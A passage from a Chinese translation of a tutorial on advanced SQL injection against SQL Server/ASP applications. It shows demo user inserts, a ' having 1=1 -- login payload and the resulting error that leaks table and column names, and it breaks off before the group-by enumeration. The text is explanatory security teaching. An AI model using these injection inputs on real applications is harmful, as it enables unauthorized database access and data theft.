SQL Server应用程序的高级Sql注入

并且插入了下面的用户：

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
insert into users values( 0, 'fred', 'sesame', 0x00ff )

我们假设攻击者要为自己插入一个用户，如果不知道表的结构的话，他不可能成功。即使他运气好，'priv'字段的重要性还不清楚。攻击者可能插入'1'，给自己在程序里添加了一个低权限的用户，而他的目标是管理员的权限。

对于攻击者来说幸运的是：如果程序返回错误(asp默认如此)，攻击者可以猜测整个数据库的结构，读取ASP程序连接到SQL-Server的帐号权限内可以读取的任何值。

(下面给出的使用上面提供的示例数据库和asp脚本来说明这些技术怎样实现的)

首先,攻击者要确定查询的表名和字段名。要做到这点，攻击者可以使用'select'语句的'having'子句：

username: ' having 1=1 --

这会引起下面的错误(译者注：having字句必须和GROUP BY或者聚合函数一起配合使用，否则出错)：

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
/process_login.asp, line 35

所以攻击者就知道了表名和第一列的列名，他们可以通过给每列加上'group by'子句继续得到其他列名，如下：